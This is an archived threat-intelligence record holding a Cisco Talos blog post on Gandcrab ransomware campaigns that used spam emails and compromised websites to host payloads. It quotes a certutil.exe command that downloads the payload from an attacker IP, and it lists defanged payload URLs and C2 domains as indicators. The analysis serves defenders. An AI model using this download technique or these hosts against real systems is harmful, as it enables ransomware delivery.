{
	"id": "c8911d09-3a0c-4251-92f7-5d7f4ae61cc2",
	"created_at": "2026-04-06T00:13:48.989824Z",
	"updated_at": "2026-04-10T13:12:51.935401Z",
	"deleted_at": null,
	"sha1_hash": "6a3a5a755f99bda83397d5d69ea138161fa52ab9",
	"title": "Gandcrab Ransomware Walks its Way onto Compromised Sites",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1042577,
	"plain_text": "Gandcrab Ransomware Walks its Way onto Compromised Sites\r\nBy Nick Biasini\r\nPublished: 2018-05-09 · Archived: 2026-04-05 14:14:02 UTC\r\nWednesday, May 9, 2018 11:40\r\nThis blog post was authored by Nick Biasini with contributions from Nick Lister and Christopher Marczewski.\r\nDespite the recent decline in the prevalence of ransomware in the threat landscape, Cisco Talos has been monitoring the now widely distributed ransomware called Gandcrab. Gandcrab is distributed through both traditional spam campaigns and multiple exploit kits, including Rig and Grandsoft. While we've seen cryptocurrency miners overtake ransomware as the most popular malware on the threat landscape, Gandcrab is proof that ransomware can still strike at any time.\r\nWhile investigating a recent spam campaign, Talos found a series of compromised websites that were being used to deliver Gandcrab. This malware is the latest in a long line of examples of why stopping malware distribution is a problem, and shows why securing websites is both an arduous and necessary task. As a clear example of how challenging resolving these issues can be, one of the sites — despite being shut down briefly — was seen serving Gandcrab not once, but twice, over a few days.\r\nThe first campaign\r\nBeginning on April 30, 2018, Talos began observing a large-scale spam campaign that disguised itself as an online order. The subject used during this campaign was \"Your Order #{Random Digits}\" (i.e. Your Order #99627). A sample of the email can be seen below.\r\nhttps://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html\r\nPage 1 of 8\n\nYou can see above that the email body is minimal and a ZIP file is attached. The attached ZIP file contains a Word document. This Word document contains a macro that downloads and executes the Gandcrab ransomware. 
In this particular instance, the malware was being downloaded from the path below:\r\nhxxp://185.189.58[.]222/bam.exe\r\nDuring the course of the campaign, we also saw emails that included VBScript files instead of a ZIP file. The end result is the same, with the payload being pulled from the server. One of the interesting aspects of this malware is the system tool used to download the payload. There are many different ways that a payload can be downloaded using macros, but this particular campaign used a somewhat novel approach: leveraging certutil.exe. Certutil.exe is a command line utility that is installed as part of Certificate Services. This campaign leveraged it to download the malicious payload. The specific syntax used is shown below:\r\ncertutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\FVAacW.exe\r\nThe -urlcache flag is designed to display or delete URL cache entries. However, by combining it with the -f and -split flags, the adversaries are able to force the URL to be downloaded to the location shown above. We have seen this technique used periodically by attackers, but it isn't commonly utilized. The file is then executed, and Gandcrab is installed on the target system.\r\nSame campaign, different location\r\nA couple of days after the initial wave of this campaign, a second one started up. Beginning on May 2, Talos observed another wave of emails that were using an almost identical campaign. The subjects, bodies, and attachments were almost identical. There was one subtle change: the location where the payload was being hosted. 
Initially, it appeared to be another random host; the GET request used to retrieve the malware is shown below:\r\nhxxp://172.104.40[.]92/js/kukul.exe\r\nWe investigated this a little further and found, when looking at DNS, that this was in fact a legitimate website (www[.]pushpakcourier[.]net). We validated this by successfully downloading the payload from hxxp://www[.]pushpakcourier[.]net/js/kukul.exe. The website itself appears to belong to a courier company based in India.\r\nWe were able to quickly determine that the website was running phpMyAdmin. We began looking a little deeper at what possible vulnerabilities could exist, and we ran into a large number, including default credentials and multiple MySQL vulnerabilities that could be leveraged. Shortly after this was discovered, the website was taken down. Talos also attempted to directly reach out to the owners to help them identify where the threat originated from and the scope of the downloads.\r\nThis incident helps shed more light on one of the biggest challenges we face: compromised websites. There are a huge number of web pages available on the internet, and many of them are running on antiquated software. Most small businesses aren't aware when a new vulnerability has been released against a web framework, and even if they were, most lack the expertise and time to frequently update the software that their websites rely upon.\r\nAdversaries, on the other hand, are able to quickly leverage these vulnerabilities and begin widely scanning the internet looking for potential victims. 
Leveraging these compromised sites in these types of spam campaigns is increasingly effective because adversaries don't need to maintain persistence, or do much of anything other than copy a file to a specific location that they can then point victim systems to, allowing for infection.\r\nAnother day, more lazy spammers\r\nShortly after the previous two campaigns, we spotted a third — again using the same basic subject, body and attachment types. This time, they ditched the IPs and started pulling the malware from another likely compromised site, this time using the domain name.\r\nhxxp://herbal-treatment-advisory[.]com/c.exe\r\nThis particular site appears to be a WordPress site, a platform with a plethora of vulnerabilities that could be leveraged. A little further digging revealed that they were running a version of WordPress that was more than a year out of date. Additionally, Talos found that this particular site had been leveraged in the past to serve Gandcrab. This is yet another example of how compromised websites will continue to be leveraged to serve malware. This allows adversaries to save time and money on things like registering domains, buying VPS, and configuring a web server to host the files. The added advantage is that they also get to leverage the web reputation of the site they compromise, which could help bypass some blocklisting technologies, at least initially.\r\nIn both cases, these websites are using older versions of software and have publicly exposed the admin pages for the web frameworks they are utilizing. These are both common things that website admins miss when they are setting up a small company site. 
Ensuring that the administrative pages are protected and the software is patched is paramount to preventing adversaries from gaining access to serve malware.\r\nSame site, different campaign\r\nOn May 5 and 7, Talos saw another set of spam campaigns launched using this same template again. These particular spammers are not putting much effort into making the campaigns unique. Over the course of several days, we repeatedly saw the same basic email with the malware being hosted in different locations. These campaigns are no exception, except that the websites aren't new. As shown below, the adversaries have returned to the same sites they were leveraging just days earlier. This is despite the fact that the websites were taken down, likely due to the malware being hosted.\r\nhxxp://pushpakcourier[.]net/css/c.exe\r\nhxxp://herbal-treatment-advisory[.]com/c.exe\r\nOver the course of a week, we saw four different spam campaigns leveraging compromised websites, and in some cases returning to the same sites, despite attempted cleaning. This is a clear example of the challenges that face small businesses trying to support a website for their organizations. Adversaries are quick to identify both vulnerabilities and exposed admin pages to leverage to distribute malware around the world.\r\nPayload\r\nGandcrab is one of the most widely distributed ransomware variants today. It is under almost constant development, with its creators releasing new versions at an aggressive pace. Its basic functionality has been well documented. It does the typical things ransomware does, including encrypting files and appending the .CRAB extension, changing the user's background, and leveraging Tor for communication.\r\nOne of the interesting elements of Gandcrab is its use of Namecoin domains for command and control (C2) communication. 
These are easily identified by the .bit top-level domain (TLD). Increasingly, adversaries rely on Tor and Namecoin domains to help evade identification. Namecoin is a decentralized DNS service that does not rely on a central authority, relying instead on a peer-to-peer network. This increases the difficulty of getting domains shut down and of identifying those who are potentially behind them.\r\nNamecoin domains provide another example of why DNS should be locked down in enterprise environments. Since Namecoin relies on a blockchain to provide authoritative responses, standard DNS servers are typically not able to serve .bit domains. If an enterprise blocks all unauthorized DNS server access, most .bit domains will be blocked. We have already started to see proxy services similar to tor2web emerge for the .bit TLD.\r\nConclusion\r\nWith billions of dollars at stake in the ransomware field, threats like Gandcrab are going to continue to emerge time and time again. There are millions and millions of web pages running on platforms that have thousands of vulnerabilities. Since most of these pages are created and maintained by small organizations that don't have the knowledge or resources to react to emerging vulnerabilities, this will continue to be a problem for the foreseeable future. As long as adversaries are able to hide their malware on legitimate sites, web reputation systems are going to be compromised.\r\nThe other thing we can learn from Gandcrab is that ransomware isn't going anywhere, even with the rise in the popularity of cryptocurrency miners. Adversaries are always going to follow the money: whether it's ransomware or malicious crypto miners, the bad guys are always looking to make a quick dollar. 
One of the biggest challenges we face as a security community is the leveraging of compromised websites to distribute malware.\r\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nCWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nIOC\r\nEmail Subject:\r\nYour Order #{Random Digits}\r\nGandcrab Hashes:\r\nC2 Domains:\r\nzonealarm[.]bit\r\nRansomware[.]bit\r\ngandcrab[.]bit\r\nCarder[.]bit\r\nCompromised Domains:\r\nHerbal-treatment-advisory[.]com\r\npushpakcourier[.]net\r\nSource: https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html"
	],
	"report_names": [
		"gandcrab-compromised-sites.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434428,
	"ts_updated_at": 1775826771,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6a3a5a755f99bda83397d5d69ea138161fa52ab9.pdf",
		"text": "https://archive.orkl.eu/6a3a5a755f99bda83397d5d69ea138161fa52ab9.txt",
		"img": "https://archive.orkl.eu/6a3a5a755f99bda83397d5d69ea138161fa52ab9.jpg"
	}
}